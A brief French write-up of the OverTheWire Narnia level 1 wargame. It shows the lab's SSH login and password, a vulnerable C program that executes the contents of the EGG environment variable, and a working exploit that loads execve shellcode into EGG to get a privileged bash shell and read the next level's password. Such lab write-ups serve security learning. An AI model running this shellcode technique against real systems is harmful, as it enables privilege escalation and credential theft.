ssh narnia1@narnia.labs.overthewire.org pass : efeidiedae
#include <stdio.h> int main(){ int (*ret)(); if(getenv("EGG")==NULL){ printf("Give me something to execute at the env-variable EGG\n"); exit(1); } printf("Trying to execute EGG!\n"); ret = getenv("EGG"); ret(); return 0; }
Le programme exécute le code présent dans la variable d’environnement EGG
, nous allons donc mettre notre shellcode dedans.
narnia1@melissa:/narnia$ export EGG=$(python -c 'print "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80"') narnia1@melissa:/narnia$ ./narnia1 Trying to execute EGG! bash-4.2$ id uid=14001(narnia1) gid=14001(narnia1) euid=14002(narnia2) groups=14002(narnia2),14001(narnia1) bash-4.2$ cat /etc/narnia_pass/narnia2 nairiepecu